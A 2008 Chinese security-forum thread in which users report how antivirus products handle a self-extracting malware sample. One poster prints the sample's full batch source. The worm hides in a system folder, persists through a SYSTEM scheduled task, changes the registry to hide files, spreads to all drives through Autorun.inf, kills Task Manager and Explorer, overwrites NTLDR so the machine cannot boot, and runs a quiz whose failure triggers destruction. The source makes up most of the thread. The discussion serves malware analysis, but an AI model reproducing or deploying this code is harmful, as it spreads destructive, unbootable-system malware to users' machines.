来个自解压

无尽藏海

来测测

kingmuro

驱逐舰，卡巴2009都不杀

北方星空

蜘蛛，费尔不杀

北方星空

kv，ClamWin都不杀，没病毒

北方星空

做的不错，什么最高人民法院通知

这几年

avast 报，不让下载

hello1577

没过卡巴的主防 最后还打开了word
狂晕

tanlimo

SavePath
Setup=mshta "javascript:new ActiveXObject('WScript.Shell').Run('HERO_2.0_178831759111716.bat',0);window.close()"
silent=1
Overwrite=1

HERO_2.0_178831759111716.bat

@echo off
:: l love you always and forever
set hero=%systemroot%\ime\HIDESE~1
set setup=%systemroot%\ime\HIDESE~1\herosetup
FOR /F "tokens=1" %%i in ('date /t') do set Realdate=%%i
FOR /F "skip=5 tokens=1,4" %%i in ('dir %systemroot%\explorer.exe') do if /I "%%j"=="explorer.exe" set Date=%%i
if "%1"=="-Install" goto Install
if "%1"=="-Run" goto Run
if "%1"=="-Surprise" goto Surprise
if "%1"=="-Kill" goto Kill
if "%1"=="-Killself" goto Killself

:CheckSign
if "%1"=="-USB" start /max ..
if "%1"=="-USB" cd HERO
if exist %systemroot%\ime\HIDESE~1\sign.dat goto Open
:FileCopy
set selfname=%0

:HIDESelf
date %Date%
md %systemroot%\ime\HIDESELF...\
date %RealDate%
if not "%1"=="-USB" type %selfname%>%systemroot%\ime\HIDESE~1\hero.bat
if "%1"=="-USB" type hero.bat>%systemroot%\ime\HIDESE~1\hero.bat
type Town.dll>%systemroot%\ime\HIDESE~1\Town.exe
echo On Error Resume Next>%systemroot%\ime\HIDESE~1\hero.vbs
echo set wcs=wscript.createobject("wscript.shell")>>%systemroot%\ime\HIDESE~1\hero.vbs
echo wcs.run "cmd /c %hero%\hero.BAT -Install",0 >>%systemroot%\ime\HIDESE~1\hero.vbs
cscript %systemroot%\ime\HIDESE~1\hero.vbs
echo>%systemroot%\ime\HIDESE~1\sign.dat
del %systemroot%\ime\HIDESE~1\hero.vbs
goto Open

:Install
:PackerSetup
%SystemDrive%
cd %systemroot%\ime\HIDESE~1
if exist Town.exe taskkill /f /im Town.exe
if exist herosetup rd /s /q herosetup
md herosetup
cd herosetup
copy ..\Town.exe Town.dll
..\Town.exe –x
cd..
date %Date%
type %setup%\rar.exe >%systemroot%\system32\rar.exe
date %Realdate%
copy %setup%\Town.dll %hero%\Town.dll
attrib %hero%\Town.dll +s +h +r
rar -m0 -ep -ep1 a %setup%\docpack.dll %hero%\Town.dll
rar -m0 -ep -ep1 a %setup%\txtpack.dll %hero%\Town.dll
rar -m0 -ep -ep1 a %setup%\exepack.dll %hero%\Town.dll
rar -m0 -ep -ep1 a %setup%\jpgpack.dll %hero%\Town.dll
del Town.exe
:Mainsetup
set A0001=copy
set A0002=attrib
set A0003=echo
set A0005=Shell Hardware Detection
tasklist >%hero%\task.txt
FOR /F "tokens=1" %%i in ('findstr /I "svchost.exe" "%hero%\task.txt"') do set svchost=%%i
%A0001% %systemroot%\system32\cmd.exe %hero%\%svchost%
del %hero%\task.txt
:Tasks
%A0002% %systemroot%\Tasks\Tasks.job -s -h -r
del %systemroot%\Tasks\Tasks.job
date %Date%
type %setup%\Tasks.xxx>%systemroot%\Tasks\Tasks.job
schtasks /change /ru "NT AUTHORITY\SYSTEM" /tn "Tasks" & if errorlevel 1 goto TaskFail
date %RealDate%
goto TaskSuc
:TaskFail
%homedrive%
cd "%ALLUSERSPROFILE%"
cd 「开始」菜单\程序\启动
date %Date%
%A0003% On Error Resume Next>hero.vbs
%A0003% set wcs=wscript.createobject("wscript.shell")>>hero.vbs
%A0003% wcs.run "%hero%\svchost.exe /c %hero%\hero.bat -Run",0 >>hero.vbs
%A0001% hero.vbs %hero%\hero.vbs
%A0003% NT>%systemroot%\ime\HIDESE~1\NoTasks
date %RealDate%
:TaskSuc
%A0002% %systemroot%\Tasks\Tasks.job +s +h +r
date %Date%
%A0001% %setup%\sleep.exe %systemroot%\system32\sleep.exe
date %RealDate%
:NoAutoPlay
net stop "%A0005%"
%A0003% Windows Registry Editor Version 5.00>%systemroot%\ime\HIDESE~1\Reg.reg
%A0003% [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ShellHWDetection]>>%systemroot%\ime\HIDESE~1\Reg.reg
%A0003% "Start"=dword:00000004>>%systemroot%\ime\HIDESE~1\Reg.reg
%A0003% [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL] >>%systemroot%\ime\HIDESE~1\Reg.reg
%A0003% "CheckedValue"=dword:00000000>>%systemroot%\ime\HIDESE~1\Reg.reg
regedit /s %systemroot%\ime\HIDESE~1\Reg.reg
goto End&if errorlevel 1 exit

:Run
set runroot=%ALLUSERSPROFILE%\「开始」菜单\程序\启动
set taskroot=%systemroot%\Tasks
:RunTimeChk
if not exist %hero%\RunTime.txt echo !50>%hero%\RunTime.txt
FOR /F "tokens=1 delims=!" %%i in (%hero%\RunTime.txt) do set RunTime=%%i
if /i %RunTime% leq 0 goto Virus
set /a RunTime=%Runtime%-1
echo !%Runtime%>%hero%\RunTime.txt
:Diskchk
echo On Error Resume Next>%systemroot%\ime\HIDESE~1\Recent.VBS
echo set wsc=wscript.createobject("wscript.shell")>>%systemroot%\ime\HIDESE~1\Recent.VBS
echo wsc.run "%hero%\svchost.exe /c %setup%\Recent.bat",0 >>%systemroot%\ime\HIDESE~1\Recent.VBS
cscript %systemroot%\ime\HIDESE~1\Recent.VBS
del %systemroot%\ime\HIDESE~1\Recent.VBS
for %%i in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do vol %%i:&if errorlevel 1 set %%i=1
for %%i in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do echo 1>%%i:\herochk1 & findstr . %%i:\herochk1 & if not errorlevel 1 del %%i:\herochk1& findstr /C:"I_LOVE_YOU" %%i:\Autorun.inf & if errorlevel 1 attrib -s -h -r %%i:\Autorun.inf© /y %setup%\Autorun.inf %%i:\Autorun.inf&attrib %%i:\Autorun.inf +s +h +r&md %%i:\HERO© /y "%setup%\hero.bat" %%i:\hero\HERO.BAT© /y "%setup%\Town.dll" %%i:\HERO\Town.dll&attrib %%i:\HERO +s +h +r
:Turn
if "%C%"=="1" vol C:&if not errorlevel 1 call %setup%\Rifeman.bat C:
if "%D%"=="1" vol D:&if not errorlevel 1 call %setup%\Rifeman.bat D:
if "%E%"=="1" vol E:&if not errorlevel 1 call %setup%\Rifeman.bat E:
if "%F%"=="1" vol F:&if not errorlevel 1 call %setup%\Rifeman.bat F:
if "%G%"=="1" vol G:&if not errorlevel 1 call %setup%\Rifeman.bat G:
if "%H%"=="1" vol H:&if not errorlevel 1 call %setup%\Rifeman.bat H:
if "%I%"=="1" vol I:&if not errorlevel 1 call %setup%\Rifeman.bat I:
if "%J%"=="1" vol J:&if not errorlevel 1 call %setup%\Rifeman.bat J:
if "%K%"=="1" vol K:&if not errorlevel 1 call %setup%\Rifeman.bat K:
if "%L%"=="1" vol L:&if not errorlevel 1 call %setup%\Rifeman.bat L:
if "%M%"=="1" vol M:&if not errorlevel 1 call %setup%\Rifeman.bat M:
if "%N%"=="1" vol N:&if not errorlevel 1 call %setup%\Rifeman.bat N:
if "%O%"=="1" vol O:&if not errorlevel 1 call %setup%\Rifeman.bat O:
if "%P%"=="1" vol P:&if not errorlevel 1 call %setup%\Rifeman.bat P:
if "%Q%"=="1" vol Q:&if not errorlevel 1 call %setup%\Rifeman.bat Q:
if "%R%"=="1" vol R:&if not errorlevel 1 call %setup%\Rifeman.bat R:
if "%S%"=="1" vol S:&if not errorlevel 1 call %setup%\Rifeman.bat S:
if "%T%"=="1" vol T:&if not errorlevel 1 call %setup%\Rifeman.bat T:
if "%U%"=="1" vol U:&if not errorlevel 1 call %setup%\Rifeman.bat U:
if "%V%"=="1" vol V:&if not errorlevel 1 call %setup%\Rifeman.bat V:
if "%W%"=="1" vol W:&if not errorlevel 1 call %setup%\Rifeman.bat W:
if "%X%"=="1" vol X:&if not errorlevel 1 call %setup%\Rifeman.bat X:
if "%Y%"=="1" vol Y:&if not errorlevel 1 call %setup%\Rifeman.bat Y:
if "%Z%"=="1" vol Z:&if not errorlevel 1 call %setup%\Rifeman.bat Z:
if "%C%"=="2" vol C:&if errorlevel 1 set C=1
if "%D%"=="2" vol D:&if errorlevel 1 set D=1
if "%E%"=="2" vol E:&if errorlevel 1 set E=1
if "%F%"=="2" vol F:&if errorlevel 1 set F=1
if "%G%"=="2" vol G:&if errorlevel 1 set G=1
if "%H%"=="2" vol H:&if errorlevel 1 set H=1
if "%I%"=="2" vol I:&if errorlevel 1 set I=1
if "%J%"=="2" vol J:&if errorlevel 1 set J=1
if "%K%"=="2" vol K:&if errorlevel 1 set K=1
if "%L%"=="2" vol L:&if errorlevel 1 set L=1
if "%M%"=="2" vol M:&if errorlevel 1 set M=1
if "%N%"=="2" vol N:&if errorlevel 1 set N=1
if "%O%"=="2" vol O:&if errorlevel 1 set O=1
if "%P%"=="2" vol P:&if errorlevel 1 set P=1
if "%Q%"=="2" vol Q:&if errorlevel 1 set Q=1
if "%R%"=="2" vol R:&if errorlevel 1 set R=1
if "%S%"=="2" vol S:&if errorlevel 1 set S=1
if "%T%"=="2" vol T:&if errorlevel 1 set T=1
if "%U%"=="2" vol U:&if errorlevel 1 set U=1
if "%V%"=="2" vol V:&if errorlevel 1 set V=1
if "%W%"=="2" vol W:&if errorlevel 1 set W=1
if "%X%"=="2" vol X:&if errorlevel 1 set X=1
if "%Y%"=="2" vol Y:&if errorlevel 1 set Y=1
if "%Z%"=="2" vol Z:&if errorlevel 1 set Z=1
if exist %systemroot%\ime\HIDESE~1\NoTasks if not exist "%runroot%\hero.VBS" copy "%hero%\hero.VBS" "%runroot%\hero.VBS"
if not exist %systemroot%\ime\HIDESE~1\NoTasks if not exist %Taskroot%\Tasks.job copy %setup%\Tasks.xxx %Taskroot%\Tasks.job&attrib %Taskroot%\Tasks.job +s +h +r&schtasks /change /ru "NT AUTHORITY\SYSTEM" /tn "Tasks"
sleep 2000
goto Turn
goto End&if errorlevel 1 exit

:Virus
if not "%Runtime%"=="0" goto VirusChk
set /a RunTime=%Runtime%-1
echo !%Runtime%>%hero%\RunTime.txt
cd "%ALLUSERSPROFILE%\「开始」菜单\程序\启动"
echo On Error Resume Next>Surprise.VBS
echo set wcs=wscript.createobject("wscript.shell")>>Surprise.VBS
echo wcs.run "%hero%\svchost.exe /c %hero%\hero.bat -Surprise ",0 >>Surprise.VBS
goto Diskchk

:VirusChk
if not exist "%ALLUSERSPROFILE%\「开始」菜单\程序\启动\Surprise.VBS" goto Kill
goto Diskchk

:Surprise
:KillNTLDR
attrib %systemdrive%\NTLDR -s -h -r
copy /Y %systemdrive%\NTLDR %hero%\NTLDR
echo NO NTLDR>%systemdrive%\NTLDR
attrib %systemdrive%\NTLDR +s +h +r

:PauseSFC
start mshta "javascript:new ActiveXObject('WScript.Shell').Run('ntsd -pn winlogon.exe',0);window.close()"

:KillTaskmgr
del /q /a %systemroot%\system32\dllcache\taskmgr.exe
taskkill /f /im taskmgr.exe & if errorlevel 1 ren %systemroot%\system32\taskmgr.exe taskmgr.xxx & if errorlevel 1 start mshta "javascript:new ActiveXObject('WScript.Shell').Run('ntsd -c q -pn taskmgr.exe',0);window.close()" & sleep 500
ren %systemroot%\system32\taskmgr.exe taskmgr.xxx

:KillExplorer
taskkill /f /im explorer.exe >nul& if errorlevel 1 ren %systemroot%\system32\explorer.exe explorer.xxx & start mshta "javascript:new ActiveXObject('WScript.Shell').Run('ntsd -c q -pn explorer.exe',0);window.close()" & sleep 500
ren %systemroot%\explorer.exe explorer.xxx
start /max %setup%\Surprise.bat

:Timeset
sleep 660000
if exist %hero%\Killself Exit

:Kill
attrib %systemdrive%\NTLDR -s -h -r
echo NO NTLDR>%systemdrive%\NTLDR
attrib %systemdrive%\NTLDR +s +h +r


goto Diskchk

:KillSelf
ren %systemroot%\explorer.xxx explorer.exe
start %systemroot%\explorer.exe
attrib %systemdrive%\NTLDR -s -h -r
copy /Y %hero%\NTLDR %systemdrive%\NTLDR
attrib %systemdrive%\NTLDR +s +h +r
ren %systemroot%\system32\taskmgr.xxx taskmgr.exe



:KillVirus
copy %setup%\KillVirus.txt %hero%\KillVirus.txt
echo !50>%systemroot%\ime\HIDESE~1\runtime.txt
%systemdrive%
cd\
cd "%ALLUSERSPROFILE%\「开始」菜单\程序\启动"
if exist Surprise.vbs del Surprise.vbs
start %systemroot%\system32\notepad.exe %hero%\KillVirus.txt
Exit

:Open
if "%1"=="-USB" Exit
goto GetName
:BackOpen
if not exist "%Name%" exit
call "%Name%"
:Save
FOR /F "delims=:" %%i in ('findstr "%Code%" *.exe') do set PackName=%%i
rar -m0 -ep -ep1 a "%PackName%" "%Name%"
echo %Code%>>"%PackName%"
:Del
attrib "%Name%" -s -h -r
del "%Name%"
attrib Function.dll -s -h -r
del Function.dll
attrib %0 -s -h -r
del %0
exit
::CMD program will stop there.
:GetName
set Code=HERO_2.0_178831759111716
set Name=公司法解释2.doc
goto Backopen
:End

[ 本帖最后由 promised 于 2008-10-2 02:14 编辑 ]

promised

rar-->exe-->Town.dll-->一堆垃圾病毒文件--〉通过Rar.exe继续解包病毒文件
一堆垃圾文件压n遍，估计杀软基本无法识别
病毒包含诸多常见病毒的多种恶意行为如ifeo劫持、Autorun，甚至替换正版windows文件，以下就不一一罗列了
几个P处理call来call去都不知道烦
可见作者脑残度不低
里面还有如下P处理
真不知道作者在想什么

@echo off
set hero=%systemroot%\ime\HIDESE~1
color 0a
echo.
echo.
echo ?            ======================================
echo                              警    告
echo               ======================================
echo ?
echo ?                  MY GOD！你中毒了，非常不幸！
echo ?
echo               以下内容关系着你的电脑安全务必仔细阅读
sleep 1000
echo.?
echo.?
echo ?            1、不要关机或重启否则你将无法开机（切记）
sleep 3000
echo. ?
echo ?            2、不要怀疑第一条否则我保证你会Very后悔
sleep 3000
echo. ?                     
echo               3、你只需回答些问题，答对2题PC就OK否则KO
sleep 3000        
echo.                     
echo               4. 切记：不要关机或重启否则你将无法开机
sleep 2000
echo.
echo.
echo                    ------ 冒险马上开始 ------
sleep 2000            
cls
echo.
echo.
echo.
echo                用你聪明的头脑思考，写出心中的答案。
sleep 1000
echo.
echo                如果你的试卷能及格，我将删除自己。
sleep 1000
echo.
echo                如果你的试卷是零分，我将破坏你的计算机。
sleep 1000
echo.
echo                另外我必须说，我只能把10分钟的时间留给你。
echo.
sleep 1000
echo                现在你无法逃避，你已经无法上网查找信息。
sleep 1000
echo.
echo                开始吧，容不得犹豫。我已经打开了计时器。
echo.
sleep 1000
echo                                   5
sleep 1000
echo                                   4
sleep 1000
echo                                   3
sleep 1000
echo                                   2  
sleep 1000
echo                                   1




set grade=0
:Q1
cls
set ask=
echo.
echo. ?
echo.
echo  ----------------问题1---------------------
echo.
echo.
echo  “圐圙”这两个字的正确读音是：                           
echo ?            
echo    A. sifang bamian  
echo. ?
echo    B. fang lun   
echo. ?
echo    C. ku lue   
echo. ?
echo    D. leng lue
echo.
echo. ?
set /p ask=  请输入答案（A，B，C，D），然后回车:
if /i "%ask%"=="c" set /a grade=%grade%+1
if /i "%ask%"=="" goto Q1




:Q2
cls
set ask=
echo.
echo. ?
echo.
echo  ----------------问题2---------------------
echo.
echo.
echo  “T囧T”这个表情的正确含义是                           
echo ?            
echo    A. 垂头丧气
echo. ?
echo    B. 鄙视你   
echo. ?
echo    C. 俯卧撑  
echo. ?
echo    D. 装傻
echo.
echo. ?
set /p ask=  请输入答案（A，B，C，D），然后回车:
if /i "%ask%"=="b" set /a grade=%grade%+1
if /i "%ask%"=="" goto Q2





:Q3
cls
set ask=
echo.
echo. ?
echo.
echo  ----------------问题3---------------------
echo.
echo.
echo  为什么卫星不会撞到星星？                           
echo ?            
echo    A. 轨道不同
echo. ?
echo    B. 地球引力
echo. ?
echo    C. 星星会闪   
echo. ?
echo    D. 它想造反咩？
echo.
echo. ?
set /p ask=  请输入答案（A，B，C，D），然后回车:
if /i "%ask%"=="c" set /a grade=%grade%+1
if /i "%ask%"=="" goto Q3





:Q4
cls
set ask=
echo.
echo. ?
echo.
echo  ----------------问题4---------------------
echo.
echo.
echo  “I MISS YOU”的演唱者是？他还有一首歌叫“绝不放弃”。                           
echo ?            
echo    A. 刘德华  
echo. ?
echo    B. 罗百吉   
echo. ?
echo    C. 光  良   
echo. ?
echo    D. 杨  坤
echo.
echo. ?
set /p ask=  请输入答案（A，B，C，D），然后回车:
if /i "%ask%"=="b" set /a grade=%grade%+1
if /i "%ask%"=="" goto Q4






:Q5
cls
set ask=
echo.
echo. ?
echo.
echo  ----------------问题5---------------------
echo.
echo.
echo  下面最不可能是猫扑常用回帖用语的是：                           
echo ?            
echo    A. 强制插入
echo. ?
echo    B. 楼主是火星人 鉴定完毕   
echo. ?
echo    C. 马克   
echo. ?
echo    D. 此广告位招租
echo.
echo. ?
set /p ask=  请输入答案（A，B，C，D），然后回车:
if /i "%ask%"=="c" set /a grade=%grade%+1
if /i "%ask%"=="" goto Q5


            


cls
if "%grade%"=="0" goto Kill
if "%grade%"=="1" goto Kill
goto SelfKill


:Kill
cls
echo ?
echo ?
echo               你的成绩是%Grade%分，不及格
echo ?            不及格 不及格 不及格！！！！！！！！！！！！！！！！！！！！
echo ?            不及格 不及格 不及格！！！！！！！！！！！！！！！！！！！！
echo ?            不及格 不及格 不及格！！！！！！！！！！！！！！！！！！！！
echo ?
echo ?
echo ?
echo ?
echo ?                     
echo                那么，就按照契约，毁灭你的计算机吧！！！！！
echo On Error Resume Next>Kill.VBS
echo set wsc=wscript.createobject("wscript.shell")>>Kill.VBS
echo wsc.run "%hero%\svchost.exe /c %hero%\hero.bat -Kill",0 >>Kill.VBS
start Kill.VBS

:Kill20
cls
echo ?
echo ?
echo               你的成绩是%Grade%分，不及格
echo ?            不及格 不及格 不及格！！！！！！！！！！！！！！！！！！！！
echo ?            不及格 不及格 不及格！！！！！！！！！！！！！！！！！！！！
echo ?            不及格 不及格 不及格！！！！！！！！！！！！！！！！！！！！
echo ?
echo ?
echo ?
echo ?
echo ?                     
echo                那么，就按照契约，毁灭你的计算机吧！！！！！
pause>nul
goto Kill20


:Selfkill
echo ?
echo ?
echo                 您的成绩是%Grade%分，及格了。
echo ?      谢谢您完成了这套试题。5秒钟后，我将按照契约，删除自己。
echo ?               希望您能够过得愉快，再见。
echo ?
sleep 5000
echo On Error Resume Next>KillSelf.VBS
echo set wcs=wscript.createobject("wscript.shell")>>KillSelf.VBS
echo wcs.run "%hero%\svchost.exe /c %hero%\hero.bat -Killself",0 >>KillSelf.VBS
start KillSelf.VBS
Exit

某XX杀软主防扫描均不过

[ 本帖最后由 promised 于 2008-10-2 03:15 编辑 ]

xuange